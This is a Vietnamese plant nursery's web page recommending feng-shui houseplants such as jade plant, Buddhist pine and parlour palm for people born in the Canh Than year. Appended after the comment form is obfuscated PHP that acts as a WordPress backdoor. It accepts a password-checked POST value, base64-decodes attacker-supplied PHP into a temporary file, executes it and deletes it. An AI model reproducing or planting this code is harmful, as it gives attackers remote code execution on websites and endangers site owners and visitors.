Tuổi Canh Thân nên trồng cây gì?

Giá : Liên Hệ

Với hơn 20 năm kinh nghiệm trong nghề, vườn cây Hòa Bình cam kết:

Cung cấp cây sấu đảm bảo chất lượng với đủ kích cỡ, không giới hạn về số lượng

Trồng và chăm sóc cây đảm bảo kĩ thuật hiện đại

Bảo hành dài hạn: lên tới 6 tháng.

Hướng dẫn kĩ thuật chăm sóc cây sấu sai quả, mang lại hiệu quả kinh tế.

Đánh giá

Bạn là người yêu thích cây cảnh? Bạn tuổi Canh Thân và bạn muốn tìm một cây cảnh hợp với mệnh của mình? Vậy cây cảnh nào sẽ đem lại nhiều may mắn tài lộc cho bạn? Hãy để vuoncayhoabinh.com giúp bạn giải đáp những câu hỏi đó nhé!

Tuổi Canh Thân nên trồng cây gì?
Tuổi Canh Thân nên trồng cây gì?

Giới thiệu sơ lược về tuổi Canh Thân

Người Canh Thân tuổi khỉ. Họ là những người thuộc mệnh Mộc. Bản thân những người tuổi Canh Thân thường hay gặp ốm đau. Cuộc sống hay nay đây mai đó, thường xuyên gặp gian nan. Tuy nhiên, tính của họ lại là người chẳng sợ nắng mưa, dù gian nan mấy cũng nhất quyết làm đến cùng. Một khi muốn làm gì thì sẽ dốc sức làm bằng được.

 

Bản tính người tuổi Canh Thân là người hay làm, thích tự lực cánh sinh hơn là phải dựa dẫm vào người khác, thích tự tay tạo ra của cải chứ nhất định không muốn ngửa tay xin người khác.

 

Nếu bạn tuổi Canh Thân và muốn trồng cây cảnh, hãy tham khảo đến những cây dưới đây.

Cây Ngọc Bích

 

Loại cây nhỏ nhắn này còn được gọi với cái tên thường xanh. Đây là một loại cây dễ trồng và đẹp đẽ nên được rất nhiều người yêu thích. Để trồng nó, rất đơn giản, chỉ cần cắm một chiếc lá xuống đất. Chiếc lá đó hút ẩm rồi sau đó lá sẽ mọc hành cây con và có rễ đầy đủ.

 

Trong ngũ hành, cây ngọc bích thuộc mệnh kim, không nên đặt cây ở hướng đông nam để tránh trường hợp bị xung khắc với gia chủ.

 

Cây Ngọc Bích tượng trưng cho tài lộc, cho tiền tài, danh lợi. Bởi vậy có không ít các doanh nhân, người làm nghề buôn bán họ đều trồng Ngọc Bích và đặt nó ở ngay cửa ra vào để mong tiền tài về đến cửa.

Tuổi Canh Thân nên trồng cây gì?
Tuổi Canh Thân nên trồng cây gì?

 

Cây vạn niên tùng

 

Hay còn được biết đến với cái tên tùng la hán bởi dáng vẻ rất giống tượng la hán của nó. Chính vì dáng vẻ đó mà tùng la hán được cho rằng là loại cây có linh khí. Nếu được chăm sóc cẩn thận nhất định sẽ đem đến phúc lộc cho gia chủ.

 

Cây có sức sống rất bền bỉ, có thể chịu hạn cũng như ngập úng rất tốt. Đã vậy cây còn có sắc xanh quanh năm, mang đến một không gian trong lành, một bầu không khí tươi mát cho môi trường xung quanh.

 

Cây tùng la hán rất hợp với người tuổi Canh Thân, bởi người tuổi Canh Thân tính tình lương thiện, lại thẳng thắn, cứng cỏi giống như cây tùng la hán vậy. Luôn cứng cáp, mạnh mẽ đứng vững, thẳng lưng, hiên ngang như một người anh hùng đầu đội trời, chân đạp đất.

Tuổi Canh Thân nên trồng cây gì?
Tuổi Canh Thân nên trồng cây gì?

Cây ngọc ngân

 

Là một loại cây nhỏ nhắn đẹp đẽ, cây ngọc ngân được rất nhiều người ưa chuộng, lựa chọn làm cây cảnh ở nhà mình. Với những chiếc lá không có màu xanh lục như những loại cây khác, ngọc ngân có những chiếc lá màu trắng ở giữa, màu xanh lục nhạt bên ngoài, rất ấn tượng, rất nổi bật.

 

Đây là loại cây tượng trưng cho tình yêu. Mỗi loại cây lại có một thông điệp, ý nghĩa nhất định. Ví dụ như cây hoa bỉ ngạn. Đây là loài hoa tượng trưng cho sự chia ly, cho những điều buồn bã. Ra hoa thì không ra lá, ra lá thì sẽ không ra hoa. Lá và hoa vĩnh viễn không bao giờ gặp nhau, giống như tình cảm của đôi trai gái, yêu nhau sâu đậm nhưng lại vĩnh viễn không thể đến với nhau vậy.

Tuổi Canh Thân nên trồng cây gì?
Tuổi Canh Thân nên trồng cây gì?

Cây ngọc ngân cũng có một ý nghĩa nhất định. Tuy nhiên, ý nghĩa của nó lại trái ngược với hoa bỉ ngạn. Ngọc ngân là loại cây tượng trưng cho tình yêu sâu sắc, nếu một người con trai nào đó tặng cho bạn nữ một chậu cây ngọc ngân thì điều đó có nghĩa là “Anh đã thuộc về em rồi !”

 

Đồng thời, ngọc ngân còn có khả năng hút bụi, lọc không khí rất tốt.

 

Cây cau tiểu trâm

 

Khác với những giống cau khác là phải to, phải cao, cau tiểu trâm lại có ngoại hình vô cùng bé nhỏ, thích hợp trồng trong những chiếc chậu bé xinh. Đây là một loại cây có rất nhiều ý nghĩa.

 

Tuy không lớn như những người anh em khác nhưng cau tiểu trâm lại có sức sống phi thường, khả năng vượt qua những khắc nghiệt vô cùng tốt. Điều đó tượng trưng cho ý chí vươn lên trong khó khăn, là tinh thần kiên cường, mạnh mẽ không thua kém bất kỳ một loại cây to lớn nào.

 

Trong phong thuỷ, cây cau tiểu trâm được coi là một loại cây có thể trừ tà khí, loại bỏ những khí xấu, mở đường cho tài lộc đến nhà. Với những người tuổi Canh Thân, cây cau tiểu trâm có những ích lợi vô cùng tốt đó.

Tuổi Canh Thân nên trồng cây gì?
Tuổi Canh Thân nên trồng cây gì?

Cây trầu bà xanh

 

Là một loại cây thuộc họ trầu bà, cây trầu bà xanh cũng đem đến cho gia những may mắn, tài lộc, đại cát. Với những người mệnh Mộc như người tuổi Canh Thân, cây trầu bà xanh rất phù hợp. Tốt hơn nên đặt một chậu nhỏ trầu bà xanh ở phòng làm việc.

 

Nó sẽ giúp tạo ra một môi trường làm việc hài hoà hơn, thân thiện hơn, mang lại thành đạt cho gia chủ. Những người như lãnh đạo hay quản lý, họ rất hay đặt những chậu trầu bà xanh trên bàn làm việc của mình.

Tuổi Canh Thân nên trồng cây gì?
Tuổi Canh Thân nên trồng cây gì?

 

Những thông tin trên đã có thể giúp bạn giải đáp được những thắc mắc của mình chưa? Hy vọng vuoncayhoabinh.com đã cung cấp cho bạn những thông tin hữu ích để bạn co thể lựa chọn cho mình những cây cảnh phù hợp với tuổi Canh Thân. Hãy liên hệ ngay với chúng tôi để mang về cho mình những dòng cây tốt nhất nhé.

 

Trả lời

Email của bạn sẽ không được hiển thị công khai.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}